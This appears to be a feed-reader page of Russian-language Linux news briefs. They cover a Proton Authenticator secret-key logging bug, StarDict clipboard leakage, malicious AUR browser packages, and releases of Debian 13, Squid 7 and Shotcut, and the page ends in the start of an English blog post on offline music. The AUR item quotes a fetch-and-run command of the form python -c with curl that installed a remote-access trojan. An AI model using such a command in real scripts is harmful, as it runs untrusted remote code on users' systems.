Feed digilinux.ru [copy] http://digilinux.ru/feed/ has loading error: cURL error 22: The requested URL returned error: 403 Forbidden
Feed freepost [copy] https://freepo.st/rss/new has loading error: cURL error 22: The requested URL returned error: 500
В Proton Authenticator для iOS выявлено оседание секретных ключей в отладочном логе
В представленном на прошлой неделе приложении Proton Authenticator, применяемом для аутентификации при помощи одноразовых паролей, выявлена проблема с конфиденциальностью - в сборках для мобильной платформы iOS забыли отключить детализированный отладочный лог, в котором открытым текстом сохранялись исходные секретные ключи для генерации одноразовых паролей. Подобный лог сводил на нет шифрование ключей и ограничение к ним доступа по PIN-коду или биометрической аутентификации. Проблема устранена в обновлении 1.1.1. В сборках для Android в лог сохранялся только идентификатор ключа, а не сам ключ.
Третий кандидат в релизы инсталлятора Debian 13
Опубликован третий кандидат в релизы инсталлятора следующего значительного релиза Debian 13 "Trixie". Неделю назад ветка Debian 13 была переведена в состояние полной заморозки перед релизом, при которой остановлен перенос любых изменений пакетов в ветку Testing (исключение может быть сделано только после специального запроса и проведения ручного рецензирования командой, отвечающей за подготовку релиза). Релиз запланирован на 9 августа.
Пакет StarDict в Debian отправляет выделенный текст на внешние серверы
В предлагаемом в репозитории Debian Testing (будущий релиз Debian 13) пакете StarDict, реализующем интерфейс для поиска в словарях, выявлена проблема с конфиденциальностью - в конфигурации по умолчанию приложение отправляет автоматически помещаемый в буфер обмена выделенный текст (x11 PRIMARY selection) на внешние серверы. Достаточно в любом приложении выделить отрывок текста, и он сразу отправляется без шифрования по протоколу HTTP на китайские серверы online-словарей dict.youdao.com и dict.cn. Проблема проявляется только при работе в окружениях на базе протокола X11, при использовании Wayland по умолчанию применяется изоляция буфера обмена.
В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов
В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.
В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.
Вредоносный пакет был загружен позавчера и был удалён администраторами...
Стабильный релиз прокси-сервера Squid 7
Представлен стабильный релиз прокси-сервера Squid 7.1, готовый для использования в рабочих системах (выпуски 7.0.x имели статус бета-версий). После придания ветке 7.x статуса стабильной, в ней отныне будут производиться только исправления уязвимостей и проблем со стабильностью, также допускается внесение небольших оптимизаций. Разработка новых возможностей будет производиться в новой экспериментальной ветке 8.0. Пользователям прошлой стабильной ветки 6.x рекомендуется спланировать переход на ветку 7.x.
Shotcut 25.07.26
Выпущен Shotcut 25.07.26 — новая стабильная версия бесплатного видеоредактора доступна для Linux, macOS и Windows.
Основные нововведения:
Добавлен загрузчик моделей Speech to Text (включая Whisper.cpp (GGML)).
Новая тема интерфейса — System Fusion.
Фильтр Outline для работы с альфа-каналом (полезно для текста и прозрачных элементов).
Регулировка громкости аудио перетаскиванием пиковой линии волны.
Настройка Adjust Clip Gain/Volume в параметрах таймлайна.
Улучшения:
Поддержка 4 каналов в аудиофильтрах (Balance, Copy Channel и др.).
Режим Scrub While Dragging для точного редактирования на таймлайне.
Удержание Shift для тримминга с эффектом ripple (даже при отключённом Ripple).
Исправления:
Баги с 10-битным видео, Balance/Pan для многоканального аудио.
Проблемы с конвертацией iPhone 16 Pro (Ambisonic audio).
Ошибки в Mask: Apply и Freeze Frame.
...В Clang намерены добавить режим усиленной безопасности
Аарон Баллман (Aaron Ballman), главный сопровождающий компилятор Clang и участник команд разработки стандартов WG21 (C++) и WG14 (C), начал обсуждение добавления в компилятор Clang режима усиления безопасности. Новый режим позволит разом активировать набор опций для усиления защиты по аналогии с добавленным в GCC 14 флагом "-fhardened", при котором включаются опции "-D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -ftrivial-auto-var-init=zero -fPIE -pie -Wl,-z,relro,-z,now -fstack-protector-strong -fstack-clash-protection -fcf-protection=full".
Четвёртый экспериментальный выпуск среды рабочего стола Orbitiny
Опубликован четвёртый выпуск среды рабочего стола Orbitiny Desktop, написанной с нуля с использованием фреймворка Qt. Проект пытается совместить некоторые инновационные идеи, которые раньше не встречались в пользовательских окружениях, с традиционными элементами, такими как панель, меню и размещение пиктограмм на рабочем столе. Код написан на языке C++ и распространяется под лицензией GPL.
На соревновании Pwn2Own готовы выплатить миллион долларов за уязвимость в WhatsApp
Проект Zero Day Initiative (ZDI), предоставляющий денежные вознаграждения за сообщения о неисправленных уязвимостях, анонсировал проведение соревнований Pwn2Own Ireland 2025, которые состоятся в середине октября в Ирландии. Участникам предложено продемонстрировать эксплоиты для ранее неизвестных уязвимостей (0-day) в смартфонах, мессенджерах, беспроводных точках доступа, устройствах для умного дома, принтерах, сетевых хранилищах, системах видеонаблюдения и устройствах виртуальной /дополненной реальности. Атака должна быть проведена на самые свежие программы и операционные системы со всеми доступными обновлениями и в конфигурации по умолчанию.
High Quality Offline Music
After having on on-and-off relationship with streaming platforms for several years, in 2023 I decided to let my Spotify Premium subscription lapse and instead go back to a traditional local (offline) music catalog. My primary motivation was the lack of proper internet infrastructure in various places, that made it increasingly hard to stream from an online source. In addition, Spotify in particular became more and more of an annoyance, logging me out of my devices every once in a while, because they thought they had detected unauthorized access, or because I was streaming from a source IP that the service didn’t seem to like. On top of that,...